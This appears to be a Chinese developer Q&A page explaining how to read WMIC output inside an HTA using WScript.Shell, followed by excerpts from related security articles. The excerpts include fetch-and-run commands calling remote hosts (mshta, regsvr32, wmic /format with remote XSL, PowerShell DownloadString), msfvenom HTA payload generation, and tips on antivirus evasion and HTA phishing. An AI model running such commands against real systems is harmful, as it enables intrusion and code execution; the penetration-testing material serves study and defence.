开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

是否可以在HTA的IE11 WSShell中直接获得WMIC的输出？

在HTA的IE11 WSShell中可以通过运行WMIC命令获取其输出。HTA（HTML应用程序）是一种基于HTML和脚本的应用程序开发模型，它可以在本地运行，类似于桌面应用程序。而IE11 WSShell是HTA运行环境的一部分，提供了与本地操作系统进行交互的能力。

WMIC（Windows管理控制台）是Windows操作系统提供的命令行工具，可以用于管理本地或远程计算机的系统信息、软件、网络等各个方面。它可以通过执行命令来获取系统信息，并将结果输出到命令行界面。

在HTA的IE11 WSShell中可以通过以下步骤获取WMIC的输出：

在HTA的HTML代码中，使用WScript对象创建一个WshShell对象，可以通过这个对象来执行命令。

<script language="VBScript">
  Set WshShell = CreateObject("WScript.Shell")
</script>

在需要获取WMIC输出的地方，使用WshShell对象的Run方法执行WMIC命令，并将输出保存到一个变量中。

<script language="VBScript">
  Set WshShell = CreateObject("WScript.Shell")
  command = "wmic your_command_here"
  Set wmicOutput = WshShell.Exec(command).StdOut
  output = wmicOutput.ReadAll()
</script>

请将"your_command_here"替换为您想要运行的实际WMIC命令。

可以将获取到的输出在HTA界面中展示出来，例如在一个文本框中显示。

<textarea id="outputArea" rows="10" cols="50"></textarea>
<script language="VBScript">
  Set WshShell = CreateObject("WScript.Shell")
  command = "wmic your_command_here"
  Set wmicOutput = WshShell.Exec(command).StdOut
  output = wmicOutput.ReadAll()
  document.getElementById("outputArea").value = output
</script>

需要注意的是，在HTA的IE11 WSShell中运行WMIC命令需要一定的系统权限，例如管理员权限。因此，如果您的HTA应用程序没有足够的权限，可能无法获取到WMIC的输出。

推荐的腾讯云相关产品和产品介绍链接地址：

云服务器（CVM）：提供灵活可扩展的云服务器实例，适用于各种应用场景。详情请参考：https://cloud.tencent.com/product/cvm
云数据库 MySQL 版（CMYSQL）：基于开源的 MySQL 数据库引擎，提供高性能、高可用的数据库服务。详情请参考：https://cloud.tencent.com/product/cmysql

请注意，以上推荐的产品仅为示例，具体的产品选择应根据实际需求和情况进行评估和选择。

相关搜索:是否可以在Excel中直接查看每个VBA命令的信息？是否可以在CI的DevOps中直接使用GitHub存储库是否可以在凸起的按钮中获得MaterialPageRoute 是否可以在Keras中更改训练输出的格式？在spacy中，是否可以在匹配中获得相应的规则id 是否可以在文档本身中显示文档测试的输出？是否可以在输出中隐藏通过的nightwatch.js测试？是否可以在Watson Visual Recognition中获得分类内容的位置？是否有一种方法可以在不使用"JOINS“和"WITH AS”方法的情况下获得相同的输出是否可以在R中循环搜索和保存spocc()输出的结果？我们是否可以在android中获得特定儿童布局的可滚动视图是否可以在Pentaho的PDI转换步骤中获得"Carte Object ID“？在路径中包含属性的networkx中是否可以获得唯一的路径？在激活Action事件方法时，我是否可以获得javafxml对象的id？在github中是否有一个稳定的url可以始终获得默认分支？是否可以在cmd.exe中将环境变量设置为命令的输出我想在ADF管道中获得databricks活动的输出，这样我就可以在以后的ADF活动中使用这些输出参数是否可以在触发器执行过程中获得触发器的相关信息？是否可以在不换行符的情况下获得用户输入(多行消息是否可以在` `git for-each-ref`命令的输出中包含远程服务器的url？

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

WMI利用(横向移动)

注意：wmic命令需要本地管理员或域管理员才可以进行正常使用，普通权限用户若想要使用wmi，可以修改普通用户的ACL，不过修改用户的ACL也需要管理员权限，这里笔者单独罗列小结：普通用户使用wmic。...，可以按照实际情况进行筛选 wmic desktop get screensaversecure,screensavertimeout #查看当前系统是否有屏保保护，延迟是多少 wmic process...以及监听器在客户机上执行wmic命令，让指定的主机上线CS · payload generator 注意：测试下载时，可以自行使用Python开启WEB共享服务。...wmic命令，让指定机器上线CS · XSL 如下为普通的xsl恶意文件，我们可以在下例中修改Run()中的Payload，本地运行恶意程序或者远程使用Powershell亦或者其他下载命令等等，我们可以自行搭配...希望在实际攻防中，根据自身经验优先选择现有工具进行操作，如若没有趁手的，则可以自己使用.net或者VBS来进行开发。

2.8K1 0

js触发全屏事件

= new ActiveXObject('WScript.Shell'); WsShell.SendKeys('{F11}'); //写全屏后的执行函数 }...} //IE11 else if(element.msRequestFullscreen) { element.msRequestFullscreen(); ...= new ActiveXObject('WScript.Shell'); WsShell.SendKeys('{F11}'); //写退出全屏后的执行函数 }...} } 此方法亲身实践过，有效下面这个方法未实践，不知是否有效让用户端JS触发指的就是让用JS监听用户的操作事件，通过JS程序去实现F11全屏。...这个事件可以是一个按钮的点击事件，当然也可以是键盘事件，比如用户按下F11。

16K3 0

windows无exe

利用上传或远程加载对应payload脚本，直接调用解析器运行（可以使用Invoke-Obfuscation或者 Invoke-DOSfuscation 等进行混淆）用Windows自带的工具或脚本等原生工具实现执行恶意代码...、启动程序、执行脚本、窃取数据、横向扩展、维持访问等，常用的有regsvr32.exe、rundll32.exe、certutil.exe、schtasks.exe、wmic.exe等，脚本类型的有：winrm.vbs....DownloadString('http://x.x.x.x/Script.ps1'); Script [argv]" mshta.exe msf use exploit/windows/misc/hta_server...&WScript.exe 上述两个工具都可以解析运行vbs和js的脚本。...但值得注意的是WScript是将输出结果以对话框的形式显示，而CScript是以命令行的形式显示输出结果。

1.6K2 0

获取主机已安装程序的多种方式

0x02 通过控制面板查看安装程序我们先去控制面板看下总共安装了多少程序，开始菜单 -> 控制面板 -> 程序 -> 程序和功能，也可以在命令行下直接输入appwiz.cpl打开程序和功能查看。...，用来编译mof文件，并将mof文件中的信息添加到WMI数据库中，可以用WMI Explorer工具来查看WMI支持的各种类。...所以我们可以直接通过Mofcomp.exe执行SampleProductsList.mof文件将读取到的注册表项中的子健结果添加进VMI数据库中，然后再用WMIC命令查询即可。...也是通过读取几个注册表项来获取主机上的已安装程序，加了个判断系统位数，自动判断注册表重定向，但这种方式在执行时肯定会被某数字防护拦截。...参考链接： https://3gstudent.github.io/渗透基础-获得当前系统已安装的程序列表 https://docs.microsoft.com/zh-cn/windows/win32/

1.5K2 1

shellcode免杀「建议收藏」

lordPE查看一下输出表中是否有test函数 1.3 使用Stud_PE，随便选择一个PE的dll文件，将我们劫持dll中的test函数添置其中，并将我们dll放置同一目录即可...将生成在工具目录下运行被劫持的文件即可上线！...注：会主动备份被劫持的文件，原文件命名为.exe~ 0x03 不落地执行shellcode 此处以利用wmic远程文件为例： 1、msf生成的hta链接（最好也做下免杀，..."); ]]> 2、受害方通过wmic远程下载并加载服务器中的xsl，将自动运行xsl中恶意JScript代码 wmic os...get /format:"http://xxx.xx.xx.xx:8080/hta.xsl" 0x04 远程线程注入注：一定要将MFC的使用选为在静态库中使用MFC，防止出现缺少依赖

1K2 0

通过命令下载执行恶意代码的几种姿势

在目标主机执行恶意代码，可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来，我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。...一、Linux 远程恶意代码执行 01、curl 以用curl的方式执行http页面上的shell脚本，无需download，在本地机器上直接执行。...regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll 06、wmic 执行WMIC以下命令从远程服务器下载并运行恶意...文件 mshta http://192.168.28.128/run.hta 10、msxsl msxsl.exe是微软用于命令行下处理XSL的一个程序 msxsl http://192.168.28.128...的微软已签名WSH脚本，可以利用来解析.sct脚本： "C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script

2.2K2 0

OFFENSIVE LATERAL MOVEMENT 横向移动(译文)

代表该用户执行的每个进程都有此访问令牌的副本。换句话说，它包含您的身份并说明您可以在系统上使用或不能使用的功能。...与在Linux中创建cron-job相似，您可以安排任务发生并执行所需的任何操作。...在Cobalt Strike中，使用wmic时通常会遇到这种情况，解决方法是为该用户创建令牌，因此可以从该主机传递凭据。....hta文件是Microsoft HTML应用程序文件，允许在HTML应用程序中执行Visual Basic脚本。...DLL结合使用，以实现不同的技术： URL.dll:可以运行.url（快捷方式）文件；也可以运行.hta文件 rundll32.exe url.dll,OpenURL "C:\Windows\Temp\

4.1K1 0

进攻性横向移动

在 OSI 模型的第 5 层上运行。与端口监听连接的方式类似，命名管道也可以监听请求。...以另一种方式，它包含您的身份并说明您可以在系统上使用和不能使用的内容。在不深入研究 Windows 身份验证的情况下，访问令牌引用登录会话，这是用户登录 Windows 时创建的。...它可以通过 wmic.exe 直接进行交互。...hta 文件是 Microsoft HTML 应用程序文件，允许在 HTML 应用程序中执行 Visual Basic 脚本。...DLL 配对： URL.dll：可以运行.url（快捷方式）文件；也可以运行 .hta 文件 rundll32.exe url.dll,OpenURL “C:\Windows\Temp\test.hta

2.2K1 0

渗透测试与开发技巧

在域渗透时要记得留意域内主机的本地管理员账号如果管理员疏忽，域内主机使用相同的本地管理员账号，可以通过pass-the-hash远程登录域内其他主机参考：《域渗透——Local Administrator...快捷方式的参数隐藏技巧将payload放置在260个空字符之后，这样无法在文件属性查看payload，可以用来在快捷方式中隐藏payload，欺骗用户点击，隐蔽执行代码参考：《渗透技巧——快捷方式文件的参数隐藏技巧...》 ---- Tips 23. system权限的进程在某些情况下需要进行降权使用sytem权限的进程可能会遇到以下问题: 1.无法获得当前用户的文件内容例如无法捕获用户的屏幕 2.环境变量有差异...利用分析》 ---- Tips 39 在远程系统上执行程序的方法汇总常用方法： at psexec WMIC wmiexec smbexec powershell remoting psexec的用法...脚本实现的参考地址： https://github.com/3gstudent/ListInstalledPrograms ---- Tips 62 通过wmi获得当前系统的类型 wmic /NAMESPACE

4.5K2 0

Windows上传并执行恶意代码的N种姿势

mshta http://reverse-tcp.xyz/payload.hta mshta \\webdavserver\folder\payload.hta FSI fsi.exe用于在控制台中交互式地运行...a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ Bginfo BgInfo是一个Microsoft实用程序，它可以在桌面背景中直接显示计算机的系统信息...NetSPI团队在之前有分析过利用ClickOnce这种方法在钓鱼当中的利用，但在渗透中还是需要一定的场景。...，能够通过指定URL来运行托管在远程目标上的应用程序。...中直接将文件读取到内存当中，并执行代码当中的shellcode PS C:\> $bytes = [System.IO.File]::ReadAllBytes(".

5.3K3 1

渗透技巧 | Windows上传并执行恶意代码的N种姿势

mshta http://formsec.cn/payload.hta mshta \\webdavserver\folder\payload.hta FSI fsi.exe用于在控制台中交互式地运行...a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ Bginfo BgInfo是一个Microsoft实用程序，它可以在桌面背景中直接显示计算机的系统信息...NetSPI团队在之前有分析过利用ClickOnce这种方法在钓鱼当中的利用，但在渗透中还是需要一定的场景。...，能够通过指定URL来运行托管在远程目标上的应用程序。...中直接将文件读取到内存当中，并执行代码当中的shellcode PS C:\> $bytes = [System.IO.File]::ReadAllBytes(".

3.8K5 1

使用mshta.exe绕过应用程序白名单（多种方法）

/shell.hta 同时，在受害者的命令提示符中运行上述文件时，启动handler以接收会话。...，您将获得您的meterpreter会话。.../ 启动Empire框架后，输入listener以检查是否有任何活动的侦听器。...这个工具可以绕过许多常见的防御，这对我们来说是一种优势。需要注意的主要问题是我们在cactustorch中使用的代码是通过msfvenom创建的，然后编码到Base64中，因为它只支持它。...一个资源文件和另一个hta文件现在，首先，在/usr/share/greatsct输出中输入以下命令启动python的服务器： python -m SimpleHTTPServer 80 现在在受害者

1.8K2 0

没有外部工具，如何快速发现Windows中毒了

看看这些待反测的区域，有没有任何的异常现场？在VirusTotal或者其他地方寻找他们解析的域名及IP，看是否有与之相连的样本。如果有，那么你肯定被感染了。...输入【wmic job list full】，你能够获得一个【没有可用实例】的回执，这就意味着没有已安排的项目在执行。...【netstat -abno】的，输出可能需要搜索来查看，即使这样可以还是寻找奇异的外部站点端口号码，如25、8080、6667等等。...把东西都丢到一个批处理文件中，然后设置一个主机名参数，你甚至能够在全网中使用它——获得其他计算机的适当权限，方便进行远程评估。...这个脚本可以让你更清楚的了解HTML格式的输出，其中包括了你从电脑中获取的信息： wmic /node:%1 computersystem get model,name,username,domain

1.2K5 0

利用HTA文件绕过杀软及邮件钓⻥

双击时，会弹出hta⽂件的框，有时候为了避免弹出这个框，可以在hta⽂件中添加样式：⽆⽂件执⾏hta mshta命令可以⽤来直接解析VBScript代码，因此可以在cmd中直接输⼊: mshta.exe javascript.../> 需要注意的是：图标只可以在命令⾏上显示，在桌⾯上仍然没有图标因此，我们必须寻找其它⽅法和exe⽂件进⾏拼接 copy /b %windir%\system32\calc.exe+test.hta...calc2.exe calc2.exe # 正常运⾏计算机程序 mshta %cd%\calc2.exe # 执⾏的是HTA脚本这样，我们可以在exe中绑定⼀个hta⽂件。.../b hello.chm+test.hta hello.chm 这样就实现了⽤户在点击时，在不影响原有程序的基础上执⾏我们的hta脚本。

1.9K1 0

使用mshta.exe绕过应用程序白名单

当受害者浏览恶意链接上方时，文件将被保存，并在保存后自动在受害者的PC中执行；如下图所示：然后获得meterpreter session。...您可以在trustsec.com上详细了解该软件，也可以从GitHub下载该软件，也可以仅使用此链接下载该软件。一旦您下载了Magic Unicorn。...您可以从此处下载此框架要获得《Empire》的基本指南，请访问我们介绍帝国的文章： Empire框架启动后，键入listener来检查是否有任何活动的监听器。...，该文件将保存在名为1.hta的输出文件中。...通过键入以下命令在受害者的文件中运行文件： mshta.exe http://192.168.1.109:8080/1.hta 要查看是否有任何会话打开，请键入“ agents”。

9063 0

windows 应急流程及实战演练

打开安全日志，在右边点击筛选当前日志，在事件 ID 填入 4625，查询到事件 ID4625，事件数 177007，从这个数据可以看出，服务器正则遭受暴力破解： ?...事件分析登录网站服务器进行排查，在站点目录下发现所有的脚本文件及附件都被加密为 .sage 结尾的文件，每个文件夹下都有一个 !HELP_SOS.hta 文件，打包了部分样本： ? 打开 !...绝大多数勒索病毒，是无法解密的，一旦被加密，即使支付也不一定能够获得解密密钥。在平时运维中应积极做好备份工作，数据库与源码分离（类似 OA 系统附件资源也很重要，也要备份）。...TIPS: 在 windows 下查看某个运行程序（或进程）的命令行参数使用下面的命令： wmic process get caption,commandline /value 如果想查询某一个进程的命令行参数...，使用下列方式： wmic process where caption=”svchost.exe” get caption,commandline /value 这样就可以得到进程的可执行文件位置等信息

2.9K5 0

红队笔记 - PowerView进行AD列举

例如，你可以在BloodHound中识别这一点） Get-AppLockerPolicy -Domain -LDAP "LDAP://targetdomain.com/CN={16641EA1-8DD3...如果这不起作用，请尝试其他技术，例如将 JScript 包装在 HTA 文件中或运行带有wmic. 否则提升你的特权。AppLocker 规则通常不会对（本地）管理用户强制执行。...当你在一个执行AppLocker的环境中操作时，通常会出现这种情况（见上文）。你可以通过轮询以下变量来确定你处于受限语言模式，以获得当前的语言模式。...读取LAPSPassword的权限授予用户或组读取ms-Mcs-AdmPwd属性的能力，从而获得本地管理员密码。你可以使用例如BloodHound或PowerView来寻找这个属性。...如果我们在这个组中，我们也可以用这个工具获得当前的LAPS密码。

1.2K3 0

Window 提权基础

wmic.htm 令人遗憾的是有些 Windows 的默认配置不允许使用 WMIC，除非用户是在管理员组里面。...尽管已经通过我的 WMIC 脚本收集到主机的补丁信息了，但是我们仍然可以通过下面的命令来手动收集。 ?...GPO 首选项文件可用于在域计算机上创建本地用户，当你控制的主机连接在域中时，那么就非常值得去看看存储在 SYSVOL 中的 Groups.xml 文件，任何经过身份认证的用户都可以读取该文件。...为了能够利用这个，我们需要检查两个注册表项是否已经设置，如果在这种情况下我们能够弹出 SYSTEM shell. 通过下面的命令可以查看注册表项是否启动。...作为一个低权限的用户，我们通常会想要去检查 "Authenticated Users" 。咱们来比较一下在 Windows 8 和 Windows XP SP0 中输出的不同, ?

8120 0

我有两把枪：Powershell + HTA

在win7和server08后，Powershell被集成在系统中，此举方便了服务器的管理，同样，过分的的强大也让自己危险了很多。...在实例hello.hta中的是HTA的一些参数设置，设置详情见之前HTA相关内容链接。已然有了HTA的完美辅助，如果加上Powershell的暴力输出呢？...lport=8081 -f hta-psh -o test.hta 生成的脚本内容经过base64encode加密，想学习的同学可以把base64部分还原，观察编写语法。...——人，所有理性事件中的感性漏洞也。“ （理论上可以通过标签来控制图标的，不知为何测试不成功。）...如果想假装闪退效果，可以直接在脚本结尾加入执行 “taskkill /f /im mshta.exe” kill掉mshta的进程，因为shellcode是注入在powershell中执行的，只要powershell

1.9K8 0

WMIC使用浅析

使用WMIC，我们不但可以管理本地计算机，还可以管理统一局域网内的所有远程计算机（需要必要的权限），而被管理的计算机不必事先安装WMIC。...WMIC的非交互模式主要用于批处理或者其他一些脚本文件。在WindowsXP下，低权限用户是不能使用WMIC命令的。在Win7以及之后，低权限用户也可以使用WMIC命令，且不用更改任何设置。...WMIC在信息收集和后渗透测试阶段非常有用，可以调取查看目标机的进程、服务、用户、用户组、网络连接、硬盘信息、网络共享信息、已安装补丁、启动项、已安装的软件、操作系统的相关信息和时区等。...wmiexec.vbs wmiexec.vbs脚本通过VBS调用wmic来模拟psexec的功能。wmiexec.vbs可以在远程系统中执行命令并进行回显，获得远程主机的半交互式的shell。...在powershell命令行环境执行如下命令，可以以非交互式的方式执行命令，但不会回显执行结果。

2K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭